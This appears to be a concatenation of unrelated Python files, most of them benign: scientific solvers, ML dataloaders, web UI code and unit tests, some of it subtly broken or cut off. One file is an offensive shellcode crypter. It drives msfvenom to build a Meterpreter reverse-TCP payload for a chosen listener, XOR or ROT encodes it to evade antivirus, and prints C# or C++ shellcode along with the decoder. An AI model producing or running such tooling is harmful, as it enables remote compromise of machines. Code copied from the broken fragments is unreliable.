start = time.time()
out = trial(*trial_args)
end = time.time()
if i >= dry_run:
_write_row(writer, fieldnames, setup_args + [num, i, end - start])
final = time.time()
return (final - tic) / n_times
def run_trials(method, task_name,
dry_run, times_per_input, n_input,
trial, trial_setup, trial_teardown,
parameter_names, parameter_ranges,
path_prefix = '',
append_to_csv = False):
try:
filename = os.path.join(path_prefix, '{}-{}.csv'.format(method, task_name))
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
mode = 'a' if append_to_csv else 'w'
with open(filename, mode, newline='') as csvfile:
fieldnames = parameter_names + ['rep', 'run', 'time']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
if not append_to_csv:
writer.writeheader()
for args in product(*parameter_ranges):
costs = []
for t in range(n_input):
score = 0.0
try:
trial_args = trial_setup(*args)
score = _score_loop(t, trial, trial_args, list(args),
times_per_input, dry_run,
writer, fieldnames)
trial_teardown(*trial_args)
except Exception as e:
# can provide more detailed summary if
# it happened inside a trial
return (False,
'Encountered exception in trial on inputs {}:\n'.format(args)
+ render_exception(e))
if t != n_input - 1:
time.sleep(4)
costs.append(score)
print(method, task_name, args, ["%.6f" % x for x in costs])
return (True, 'success')
except Exception as e:
return (False, 'Encountered exception:\n' + render_exception(e))
def _array2str_round(x, decimal=6):
""" print an array of float number to pretty string with round
Parameters
----------
x: Array of float or float
decimal: int
"""
if isinstance(x, list) or isinstance(x, np.ndarray):
return "[" + ", ".join([array2str_round(y, decimal=decimal)
for y in x]) + "]"
format_str = "%%.%df" % decimal
return format_str % x
|
import cv2
import pafy
from genericDetector import GenericDetector
model_path='models/object_detection_mobile_object_localizer_v1_1_default_1.tflite'
threshold = 0.25
out = cv2.VideoWriter('outpy2.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 30, (720,720))
# Initialize video
# cap = cv2.VideoCapture("video.avi")
videoUrl = 'https://youtu.be/uKyoV0uG9rQ'
videoPafy = pafy.new(videoUrl)
print(videoPafy.streams)
cap = cv2.VideoCapture(videoPafy.streams[-1].url)
# Initialize object detection model
detector = GenericDetector(model_path, threshold)
cv2.namedWindow("Detections", cv2.WINDOW_NORMAL)
cap.set(cv2.CAP_PROP_POS_FRAMES, 60)
while cap.isOpened():
try:
# Read frame from the video
ret, frame = cap.read()
except:
continue
if ret:
# Draw the detected objects
detections = detector(frame)
detection_img = detector.draw_detections(frame, detections)
out.write(detection_img)
cv2.imshow("Detections", detection_img)
else:
break
# Press key q to stop
if cv2.waitKey(1) == ord('q'):
break
cap.release()
out.release()
cv2.destroyAllWindows()
|
import streamlit as st
import datetime as dt
with st.sidebar:
n_holes = int(st.number_input("No. of hole played", min_value=1))
format_hole = lambda x: f"Hole {x}"
hole = st.selectbox("Select hole to edit:", range(1, n_holes+1), format_func=format_hole)
possible_end_lies = ["Fairway", "Green", "In The Hole", "Bermuda", "Recovery", "Kitchen"]
possible_start_lies = ["Fairway", "Recovery", "Kitchen"]
@st.cache
def add_shots_to_container(container, hole_no):
n_shots = int(
container.number_input("No. of shots played: ", min_value=1, key=hole_no)
)
shots_dict = {"hole_id": hole_no}
end_distances, end_lies, units = [], [], []
for i in range(n_shots):
shot_number = i + 1
if i == 0:
start_lie = container.selectbox(f"Shot {shot_number} start lie", possible_start_lies, key=f"start {hole_no}")
start_distance = container.number_input(
f"Shot {shot_number} start distance (yds) ", min_value=0, key=f"start dist {hole_no}"
)
shots_dict["hole_yards"] = start_distance
shots_dict["tee_lie"] = start_lie
shot_end_lie = container.selectbox(f"Shot {shot_number} end lie", possible_end_lies, key=f"end lie h:{hole_no} s:{shot_number}")
unit = "ft" if shot_end_lie in ["Green", "Bermuda"] else "yds"
end_distance = container.number_input(f"Shot {shot_number} end distance ({unit}) ", key=f"end dist h:{hole_no} s:{shot_number}")
else:
shot_end_lie = container.selectbox(f"Shot {shot_number} end lie", possible_end_lies, key=f"end lie h:{hole_no} s:{shot_number}")
unit = "ft" if shot_end_lie in ["Green", "Bermuda"] else "yds"
end_distance = container.number_input(f"Shot {shot_number} end distance ({unit}) ", key=f"end dist h:{hole_no} s:{shot_number}")
end_distances.append(end_distance)
end_lies.append(shot_end_lie)
units.append(unit)
shot_details = {
"shot_end_lie": end_lies,
"shot_end_distance": end_distances,
"distance_units": units,
"update_time":dt.datetime.now()
}
shots_dict["shot_details"] = shot_details
return shots_dict
if "shots_data" not in st.session_state:
st.session_state.shots_data = {}
cont = st.container()
cont.write(f"Hole No. {hole}")
shots_dict = add_shots_to_container(cont, hole)
st.session_state.shots_data["hole_id"] = hole
st.session_state.shots_data["hole_details"] = shots_dict
|
class Option:
def __init__(self, description:str = "...", type:int = 3):
self.description = description
self.type = type
def to_dict(self):
return {
"type": type,
"description":self.description,
"required": self.required
}
|
#!/usr/bin/python3
# Basic shellcode crypter for C# payloads
# By Cas van Cooten
import re
import platform
import argparse
import subprocess
from random import randint
if platform.system() != "Linux":
exit("[x] ERROR: Only Linux is supported for this utility script.")
class bcolors:
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
# Parse input arguments
def auto_int(x):
return int(x, 0)
parser = argparse.ArgumentParser()
parser.add_argument("lhost", help="listener IP to use")
parser.add_argument("lport", help="listener port to use")
parser.add_argument("format", help="the language to format the output in ('cs' or 'cpp')", nargs='?', default="cs")
parser.add_argument("encoding", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
parser.add_argument("key", help="the key to encode the payload with (integer)", type=auto_int, nargs='?', default=randint(1,255))
parser.add_argument("payload", help="the payload type from msfvenom to generate shellcode for (default: windows/x64/meterpreter/reverse_tcp)", nargs='?', default="windows/x64/meterpreter/reverse_tcp")
args = parser.parse_args()
# Generate the shellcode given the preferred payload
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Generating payload {bcolors.OKGREEN}{args.payload}{bcolors.OKBLUE} for LHOST={bcolors.OKGREEN}{args.lhost}{bcolors.OKBLUE} and LPORT={bcolors.OKGREEN}{args.lport}{bcolors.ENDC}")
result = subprocess.run(['msfvenom', '-p', args.payload, f"LHOST={args.lhost}", f"LPORT={args.lport}", 'exitfunc=thread', "-f", "csharp"], stdout=subprocess.PIPE)
if result.returncode != 0:
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Msfvenom generation unsuccessful. Are you sure msfvenom is installed?{bcolors.ENDC}")
# Get the payload bytes and split them
payload = re.search(r"{([^}]+)}", result.stdout.decode("utf-8")).group(1).replace('\n', '').split(",")
# Format the output payload
if args.format == "cs":
# Encode the payload with the chosen type and key
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.encoding}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
for i, byte in enumerate(payload):
byteInt = int(byte, 16)
if args.encoding == "xor":
byteInt = byteInt ^ args.key
elif args.encoding == "rot":
byteInt = byteInt + args.key & 255
else:
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
payload[i] = "{0:#0{1}x}".format(byteInt,4)
payLen = len(payload)
payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL)
payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
payloadFormatted += f"// {args.encoding}-encoded with key {hex(args.key)}\n"
payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{payload.strip()}\n}};"
if payLen > 1000:
f = open("/tmp/payload.txt", "w")
f.write(payloadFormatted)
f.close()
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}")
else:
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}")
print(payloadFormatted + "\n")
# Provide the decoding function for the heck of it
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
if args.encoding == "xor":
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
{{
buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
}}"""
if args.encoding == "rot":
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
{{
buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
}}"""
print(decodingFunc)
elif args.format == "cpp":
# Encode the payload with the chosen type and key
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.encoding}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
encodedPayload = []
for byte in payload:
byteInt = int(byte, 16)
if args.encoding == "xor":
byteInt = byteInt ^ args.key
elif args.encoding == "rot":
byteInt = byteInt + args.key & 255
else:
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
encodedPayload.append(f"\\x{byteInt:02x}")
payLen = len(encodedPayload)
payload = re.sub("(.{64})", " \"\\1\"\n", ''.join(encodedPayload), 0, re.DOTALL)
payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
payloadFormatted += f"// {args.encoding}-encoded with key {hex(args.key)}\n"
payloadFormatted += f"unsigned char buffer[] =\n {payload.strip()};"
if payLen > 1000:
f = open("/tmp/payload.txt", "w")
f.write(payloadFormatted)
f.close()
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in C++ format!{bcolors.ENDC}")
else:
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (C++):{bcolors.ENDC}")
print(payloadFormatted + "\n")
# Provide the decoding function for the heck of it
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
if args.encoding == "xor":
decodingFunc = f"""char bufferx[sizeof buffer];
int i;
for (i = 0; i < sizeof bufferx; ++i)
bufferx[i] = (char)(buffer[i] ^ {hex(args.key)});
"""
if args.encoding == "rot":
decodingFunc = f"""char bufferx[sizeof buffer];
int i;
for (i = 0; i < sizeof bufferx; ++i)
bufferx[i] = (char)(buffer[i] - {hex(args.key)} & 255);
"""
print(decodingFunc)
else:
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid formatting type (choose 'cs' for CSharp or 'cpp' for C++).{bcolors.ENDC}")
|
def Odd_and_Even_Sum(number_as_string):
odd_sum = 0
even_sum = 0
for element in number_as_string:
if int(element) % 2 == 0:
even_sum += int(element)
else:
odd_sum += int(element)
return (f"Odd sum = {odd_sum}, Even sum = {even_sum}")
number = input()
result = Odd_and_Even_Sum(number)
print(result)
|
class TriangleType:
def type(self, a, b, c):
s = sorted([a, b, c])
if s[2] >= s[0] + s[1]:
return "IMPOSSIBLE"
c = cmp(s[0] ** 2 + s[1] ** 2, s[2] ** 2)
if c == 0:
return "RIGHT"
elif c > 0:
return "ACUTE"
return "OBTUSE"
|
from tqdm import tqdm
from os.path import join, exists
import json
import collections
import tensorflow as tf
import random
random.seed(0)
class ZaloDatasetProcessor(object):
""" Base class to process & store input data for the Zalo AI Challenge dataset"""
label_list = ['False', 'True']
def __init__(self):
""" ZaloDatasetProcessor constructor
:parameter val_size: The size of the valelopment set taken from the training set
"""
self.train_data = []
self.val_data = []
self.test_data = []
def load_from_path(self, dataset_path, mode='train', file_name='train.json', encode='utf-8'):
""" Load data from file & store into memory
Need to be called before preprocess(before write_all_to_tfrecords) is called
:parameter dataset_path: The path to the directory where the dataset is stored
:parameter encode: The encoding of every dataset file
"""
mode = mode.lower()
assert mode in ['train', 'test', 'val', 'squad'], "[Preprocess] Test file mode must be 'zalo' or 'normal'"
def read_to_inputs(filepath, encode='utf-8', mode='train'):
""" A helper function that read a json file (Zalo-format) & return a list of input
:parameter filepath The source file path
:parameter encode The encoding of the source file
:parameter mode Return data for training ('normal') or for submission ('zalo')
:returns A list of input for each data instance, order preserved
"""
try:
with open(filepath, 'r', encoding=encode) as file:
data = json.load(file)
if mode == 'squad':
data = data.get('data')
res = []
for d in data:
for par in d.get('paragraphs'):
context = par.get('context')
for qas in par.get('qas'):
try:
ques = qas.get('question')
# answer = qas.get('answers')
label = qas.get('is_impossible')
# if label:
# answer_start = qas.get('plausible_answers')[0]['answer_start']
# answer = ' '.join(context.split(' ')[answer_start:])
# else:
# answer = ''
res.append({'question': ques,
'text': context,
'label': label})
except:
pass
return res
else:
return [{'question': data_instance['question'],
'text': data_instance['text'],
'label': data_instance.get('label', False)}
for data_instance in tqdm(data)]
except FileNotFoundError:
return []
# Get train data, convert to input
if mode == "train":
train_data = read_to_inputs(filepath=join(dataset_path, file_name),
encode=encode, mode="train")
self.train_data.extend(train_data)
# Get val data, convert to input
if mode == "val":
val_data = read_to_inputs(filepath=join(dataset_path, file_name),
encode=encode, mode="val")
self.val_data.extend(val_data)
if mode == "test":
test_data = read_to_inputs(filepath=join(dataset_path, file_name),
encode=encode, mode="test")
self.test_data.extend(test_data)
if mode == "squad":
train_data = read_to_inputs(filepath=join(dataset_path, file_name),
encode=encode, mode="squad")
self.train_data.extend(train_data)
# Shuffle training data
random.shuffle(self.train_data)
# Shuffle validate data
random.shuffle(self.val_data)
|
# -*- coding: utf-8 -*-
"""
Milstein's method on linear SDE
dX = λ*X dt + μ*X dW, X(0) = X0
timesteps for Brownian and Integrator are dt and Dt (see em.py)
"""
import numpy as np
from numpy.random import randn
import matplotlib.pyplot as plt
np.random.seed(100)
# problem parameters
λ = 2; μ = 1; X0 = 1
T = 1; N = 2**9; dt = T / N
t = np.arange(0, T+dt, dt)
# Brownian path
dW = np.sqrt(dt) * randn(N)
W = np.hstack(([0], np.cumsum(dW)))
# true solution for comparison
Xtrue = X0 * np.exp((λ-.5*μ**2)*t + μ*W)
# factor and numerical timestep
R = 1; Dt = R*dt
# numerical solution
Xem = np.zeros(N//R+1)
Xem[0] = X0
for i in range(1, N//R+1):
Winc = np.sum(dW[R*(i-1):R*i])
Xem[i] = Xem[i-1] + λ*Xem[i-1]*dt + μ*Xem[i-1]*Winc \
+ .5*μ**2*Xem[i-1] * (Winc**2 - dt)
plt.plot(t, Xtrue, 'b-')
plt.plot(t[::R], Xem, 'r:')
plt.xlabel('t')
plt.ylabel('X(t)')
print('err: %f' % np.abs(Xtrue[-1]-Xem[-1]))
|
from rest_framework import routers
from .api import (
AttemptLogViewSet, ContentSessionLogViewSet, ContentSummaryLogViewSet, ExamAttemptLogViewSet, ExamLogViewSet, MasteryLogViewSet,
TotalContentProgressViewSet, UserSessionLogViewSet
)
from .csv import ContentSessionLogCSVExportViewSet, ContentSummaryLogCSVExportViewSet
router = routers.SimpleRouter()
router.register(r'contentsessionlog', ContentSessionLogViewSet, base_name='contentsessionlog')
router.register(r'contentsummarylog', ContentSummaryLogViewSet, base_name='contentsummarylog')
router.register(r'usersessionlog', UserSessionLogViewSet, base_name='usersessionlog')
router.register(r'masterylog', MasteryLogViewSet, base_name='masterylog')
router.register(r'attemptlog', AttemptLogViewSet, base_name='attemptlog')
router.register(r'examlog', ExamLogViewSet, base_name='examlog')
router.register(r'examattemptlog', ExamAttemptLogViewSet, base_name='examattemptlog')
router.register(r'userprogress', TotalContentProgressViewSet, base_name='userprogress')
router.register(r'contentsummarylogcsv', ContentSummaryLogCSVExportViewSet, base_name='contentsummarylogcsv')
router.register(r'contentsessionlogcsv', ContentSessionLogCSVExportViewSet, base_name='contentsessionlogcsv')
urlpatterns = router.urls
|
from unittest.case import TestCase
from unittest.mock import patch
import pytest
import requests_mock
from .. import Rumetr, exceptions
@requests_mock.Mocker()
@patch.object(Rumetr, 'check_complex', return_value=True)
class TestHouseChecking(TestCase):
TEST_URL = 'http://api.host.com/developers/dvlpr/complexes/cmplx/houses/{house}/'
def setUp(self):
self.r = Rumetr('test', developer='dvlpr', api_host='http://api.host.com')
def test_house_ok(self, m, house_checker):
m.get(self.TEST_URL.format(house='100500'), json={})
assert self.r.check_house('cmplx', 100500)
assert 'cmplx__100500' in self.r._checked_houses # complex is saved in cached
assert house_checker.call_count == 1 # delopver has been checked either
def test_house_is_not_checked_for_the_second_time(self, *args):
self.r._checked_houses = {'cmplx__100500'}
assert self.r.check_house('cmplx', 100500) # should return True without a mock
def test_house_fail(self, m, *args):
m.get(self.TEST_URL.format(house='100500'), status_code=404)
with pytest.raises(exceptions.RumetrHouseNotFound):
assert self.r.check_house('cmplx', 100500)
def test_house_exists_1(self, m, *args):
m.get(self.TEST_URL.format(house='100500'), json={})
assert self.r.house_exists('cmplx', 100500)
def test_house_exists_2(self, m, *args):
m.get(self.TEST_URL.format(house='100500'), json={}, status_code=404)
assert not self.r.house_exists('cmplx', 100500)
|
def convert_to_binary(prm1):
_bits_needed = 1
_start = 1
_user_value = int(prm1)
_original_in = str(_user_value)
_binary_value = ""
""" Loop through the numbers from 1 increasing by
a power of 2 until we get a number that is equal
to or exceeds the users input. Increase bit
counter for each number needed """
while _user_value > _start:
_bits_needed = _bits_needed + 1
_start = _start * 2
""" When the user value is not equal to a result of a
multiplication, roll back to previous multiplication
as it will cause an erroneous bit value at the beginning
of the binary number. e.g. 31 will create a 32 value erroneously """
if _user_value != _start:
_bits_needed = _bits_needed - 1
_start = _start / 2
for x in range(_bits_needed):
if _user_value >= _start:
_user_value = _user_value - _start
_binary_value = _binary_value + "1"
_start = _start / 2
else:
_binary_value = _binary_value + "0"
_start = _start / 2
""" Break the loop and work out whether or not the final
digit of the binary number should be 0 or 1 """
if _start == 1:
if _start / _user_value == 1:
_binary_value = _binary_value + "1"
else:
_binary_value = _binary_value + "0"
if _binary_value == "":
_binary_value = 0
return _binary_value
def get_ip_address():
print("What is the IP address?")
_user_input = input() + "."
_group_dict = []
_temp = str("")
_binary_ip = ""
"""Split the IP address into multiple clusters. Perform the function on each function individually."""
for i in range(len(_user_input)):
if _user_input[i].isnumeric():
_temp = _temp + str(_user_input[i])
else:
_group_dict.append(_temp)
_temp = str("")
for i in range(len(_group_dict)):
_preceding_zeroes = 8 - len(str(convert_to_binary(_group_dict[i])))
for j in range(_preceding_zeroes):
_binary_ip = _binary_ip + str("0")
_binary_ip = _binary_ip + str(convert_to_binary(_group_dict[i])) + "."
return _binary_ip.rstrip(".")
running = True
while running:
print(get_ip_address())
|
def navier_stokes_x(i, j, u, u_tp, v, dx, dy, dt, Re):
uu_f = ((1.0/2.0) * (u[i+1, j] + u[i, j]))**2.0
uu_b = ((1.0/2.0) * (u[i-1, j] + u[i, j]))**2.0
Duu_x = (uu_f - uu_b)/dx
u_sum_f = u[i, j] + u[i, j+1]
u_sum_b = u[i, j] + u[i, j-1]
v_sum_f = v[i, j] + v[i+1, j]
v_sum_b = v[i, j-1] + v[i+1, j-1]
uv_x_f = (1.0/2.0)*(u_sum_f)*(1.0/2.0)*(v_sum_f)
uv_x_b = (1.0/2.0)*(u_sum_b)*(1.0/2.0)*(v_sum_b)
D2u_x2 = ((u[i+1, j] - 2.0*u[i, j] + u[i-1, j])/dx**2.0)
D2u_y2 = ((u[i, j+1] - 2.0*u[i, j] + u[i, j-1])/dy**2.0)
Duv_y = (uv_x_f - uv_x_b)/dy
advection_u = Duu_x + Duv_y
diffusion_u = D2u_x2 + D2u_y2
u_tp[i, j] = u[i, j] + dt * (-advection_u + (1.0/Re) * diffusion_u)
return u_tp
def navier_stokes_y(i, j, u, v_tp, v, dx, dy, dt, Re):
vv_f = ((1.0/2.0) * (v[i, j+1] + v[i, j]))**2.0
vv_b = ((1.0/2.0) * (v[i, j] + v[i, j-1]))**2.0
Dvv_y = (vv_f - vv_b)/dy
u_sum_f = u[i, j+1] + u[i, j]
u_sum_b = u[i-1, j+1] + u[i-1, j]
v_sum_f = v[i, j] + v[i+1, j]
v_sum_b = v[i, j] + v[i-1, j]
uv_y_f = (1.0/2.0)*(u_sum_f)*(1.0/2.0)*(v_sum_f)
uv_y_b = (1.0/2.0)*(u_sum_b)*(1.0/2.0)*(v_sum_b)
D2v_x2 = ((v[i+1, j] - 2.0*v[i, j] + v[i-1, j])/dx**2.0)
D2v_y2 = ((v[i, j+1] - 2.0*v[i, j] + v[i, j-1])/dy**2.0)
Duv_x = (uv_y_f - uv_y_b)/dx
advection_v = Duv_x + Dvv_y
diffusion_v = D2v_x2 + D2v_y2
v_tp[i, j] = v[i, j] + dt * (-advection_v + (1.0/Re) * diffusion_v)
return v_tp
|
import torch
import torchvision
import torchvision.transforms as transforms
def get_transforms(dataset):
transform_train = None
transform_test = None
if dataset == 'cifar10':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
if dataset == 'cifar100':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
if dataset == 'svhn':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
if dataset == 'svhn':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
if dataset == 'tiny':
transform_train = transforms.Compose([
transforms.RandomCrop(64, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
assert transform_test is not None and transform_train is not None, 'Error, no dataset %s' % dataset
return transform_train, transform_test
def get_dataloader(dataset, train_batch_size, test_batch_size, num_workers=0, root='../data', is_test=True):
transform_train, transform_test = get_transforms(dataset)
trainset, testset = None, None
if dataset == 'cifar10':
trainset = torchvision.datasets.CIFAR10(root=root, train=True, download=True, transform=transform_train)
testset = torchvision.datasets.CIFAR10(root=root, train=False, download=True, transform=transform_test)
if dataset == 'cifar100':
trainset = torchvision.datasets.CIFAR100(root=root, train=True, download=True, transform=transform_train)
testset = torchvision.datasets.CIFAR100(root=root, train=False, download=True, transform=transform_test)
if dataset == 'svhn':
trainset = torchvision.datasets.SVHN(root=root, split='train', download=True, transform=transform_train)
testset = torchvision.datasets.SVHN(root=root, split='test', download=True, transform=transform_test)
if dataset == 'tiny':
trainset = torchvision.datasets.ImageFolder(root + '/tiny-imagenet-200/train', transform=transform_train)
testset = torchvision.datasets.ImageFolder(root + '/tiny-imagenet-200/val', transform=transform_test)
assert trainset is not None and testset is not None, 'Error, no dataset %s' % dataset
trainloader = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size, shuffle=True,
num_workers=num_workers)
if not is_test:
return trainloader, None
testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False,
num_workers=num_workers)
return trainloader, testloader
|
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
def build_slider(tab, multiple=False):
children = [
dbc.Card([
dbc.Row(id='app-controller', children=[
dbc.Col(children=[
dbc.Row([
dbc.Col(dbc.Button(id=tab + 'pause-button', children='start', block=True)),
dbc.Col(dbc.Button(id=tab + 'reset-button', children='reset', block=True))
])
], width=2),
dbc.Col(
dcc.Upload(
id=tab + 'upload-data',
children=html.Div([
'Drag and Drop or ',
html.A('Select Files')
]),
multiple=multiple,
style=dict(
width='100%',
textAlign='center'
)
), width=2
),
dbc.Col(
dcc.Slider(id=tab + 'slider', min=0, max=0, step=1, value=0, disabled=False),
width=7
),
dbc.Col(html.H5(id=tab + 'slider-output-container', children='0'), width=1),
], align='center', justify='start', style=dict(padding='20px')),
html.Br()
]),
html.Br()
]
return children
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `python_greek_names` package."""
from __future__ import unicode_literals
from python_text_utils.generic import Generic
from python_greek_names.utils import (
normalize_name,
VocativeMapper,
GenitiveMapper
)
def test_normalize():
assert normalize_name('ΜΑΡΣΕΛ') == Generic.to_unicode('Μαρσελ')
assert normalize_name('Μαρσέλ') == Generic.to_unicode('Μαρσέλ')
assert normalize_name('ΜΑΡΣΈΛ') == Generic.to_unicode('Μαρσέλ')
assert normalize_name('Μαρσελ', upper=True) == Generic.to_unicode('ΜΑΡΣΕΛ')
assert normalize_name('Μαρσέλ', upper=True) == Generic.to_unicode('ΜΑΡΣΈΛ')
def test_vocative_mapper():
vm = VocativeMapper()
# Testing basic usage
assert vm.as_case('Marsel') == Generic.to_unicode('Marsel')
assert vm.as_case('Μαρσέλ') == Generic.to_unicode('Μαρσέλ')
# Upper
vm_upper = VocativeMapper(upper=True)
assert vm_upper.as_case('Μαρσέλ') == Generic.to_unicode('ΜΑΡΣΈΛ')
# Unaccented
vm_accent = VocativeMapper(accent=False)
assert vm_accent.as_case('Μαρσέλ') == Generic.to_unicode('Μαρσελ')
# Testing vocative transformations
# Exceptions
assert vm.as_case('παύλος') == Generic.to_unicode('Παύλο')
# Testing endings
assert vm.as_case('Αγάπιος') == Generic.to_unicode('Αγάπιε')
assert vm.as_case('Χαράλαμπος') == Generic.to_unicode('Χαράλαμπε')
assert vm.as_case('Πάτροκλος') == Generic.to_unicode('Πάτροκλε')
assert vm.as_case('Αγισίλαος') == Generic.to_unicode('Αγισίλαε')
assert vm.as_case('Αντίγονος') == Generic.to_unicode('Αντίγονε')
assert vm.as_case('Γιάννης') == Generic.to_unicode('Γιάννη')
# Testing extra exceptions
# Test error input
try:
VocativeMapper(extra_exceptions=123)
except Exception as ex:
assert isinstance(ex, AssertionError)
vm_exc = VocativeMapper(extra_exceptions={
'Ανακρέων': 'Ανακρέων'
})
assert vm_exc.as_case('Ανακρέων') == Generic.to_unicode('Ανακρέων')
vm_exc_upper_accent = VocativeMapper(extra_exceptions={
'Ανακρέων': 'Ανακρέων'
}, upper=True, accent=False)
assert vm_exc_upper_accent.as_case('Ανακρέων') == Generic.to_unicode('ΑΝΑΚΡΕΩΝ')
def test_genitive_mapper():
gm = GenitiveMapper()
# Testing basic usage
assert gm.as_case('Marsel') == Generic.to_unicode('Marsel')
assert gm.as_case('Μαρσέλ') == Generic.to_unicode('Μαρσέλ')
# Upper
gm_upper = GenitiveMapper(upper=True)
assert gm_upper.as_case('Μαρσέλ') == Generic.to_unicode('ΜΑΡΣΈΛ')
# Unaccented
gm_accent = GenitiveMapper(accent=False)
assert gm_accent.as_case('Μαρσέλ') == Generic.to_unicode('Μαρσελ')
# Testing vocative transformations
# Exceptions
assert gm.as_case('Φώτης') == Generic.to_unicode('Φώτη')
# Testing endings
assert gm.as_case('Αγάπιος') == Generic.to_unicode('Αγάπιου')
assert gm.as_case('Χαράλαμπος') == Generic.to_unicode('Χαράλαμπου')
assert gm.as_case('Πάτροκλος') == Generic.to_unicode('Πάτροκλου')
assert gm.as_case('Αγισίλαος') == Generic.to_unicode('Αγισίλαου')
assert gm.as_case('Αντίγονος') == Generic.to_unicode('Αντίγονου')
assert gm.as_case('Μίλτος') == Generic.to_unicode('Μίλτου')
assert gm.as_case('Νίκος') == Generic.to_unicode('Νίκου')
# Testing extra exceptions
# Test error input
try:
GenitiveMapper(extra_exceptions=123)
except Exception as ex:
assert isinstance(ex, AssertionError)
gm_exc = GenitiveMapper(extra_exceptions={
'Ανακρέων': 'Ανακρέοντα'
})
assert gm_exc.as_case('Ανακρέων') == Generic.to_unicode('Ανακρέοντα')
gm_exc_upper_accent = GenitiveMapper(extra_exceptions={
'Ανακρέων': 'Ανακρέοντα'
}, upper=True, accent=False)
assert gm_exc_upper_accent.as_case('Ανακρέων') == Generic.to_unicode('ΑΝΑΚΡΕΟΝΤΑ')
|
import os
import pandas as pd
import xml.etree.ElementTree as ET
from tqdm import tqdm
image_source = '/kaggle/input/siim-covid19-resized-to-1024px-jpg'
os.makedirs('lung_crop', exist_ok=True)
if __name__ == '__main__':
df = pd.read_csv('../../dataset/siim-covid19-detection/train_kfold.csv')
for fold in range(5):
tmp_df = df.loc[df['fold'] == fold]
meles = []
for _, row in tqdm(tmp_df.iterrows(), total=len(tmp_df)):
#image_path = f"{image_source}/train/{row['imageid']}.jpg"
ann_path = '../../dataset/lung_crop/labels/train/{}.xml'.format(row['imageid'])
yolo_ann_path = '../../dataset/lung_crop/labels/train/{}.txt'.format(row['imageid'])
tree = ET.parse(open(ann_path))
root = tree.getroot()
size = root.find('size')
width = int(size.find('width').text)
height = int(size.find('height').text)
cnt = 0
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
xmlbox = obj.find('bndbox')
x1, x2, y1, y2 = int(xmlbox.find('xmin').text), int(xmlbox.find('xmax').text), int(xmlbox.find('ymin').text), int(xmlbox.find('ymax').text)
cnt += 1
assert cnt == 1
xc = 0.5*(x1+x2)/width
yc = 0.5*(y1+y2)/height
w = (x2-x1)/width
h = (y2-y1)/height
with open(yolo_ann_path, 'w') as yolo_label_file:
yolo_label_file.write('0 {} {} {} {}\n'.format(xc, yc, w, h))
for fold in range(5):
val_df = df.loc[df['fold'] == fold].sample(frac=1).reset_index(drop=True)
train_df = df.loc[df['fold'] != fold].sample(frac=1).reset_index(drop=True)
with open("../../dataset/lung_crop/yolov5_train_fold{}.txt".format(fold), "w") as yv5_tf:
for _, row in train_df.iterrows():
#image_path = '../../dataset/lung_crop/images/train/{}.png'.format(row['imageid'])
image_path = f"{image_source}/train/{row['imageid']}.jpg"
yv5_tf.write(image_path + '\n')
with open("../../dataset/lung_crop/yolov5_valid_fold{}.txt".format(fold), "w") as yv5_vf:
for _, row in val_df.iterrows():
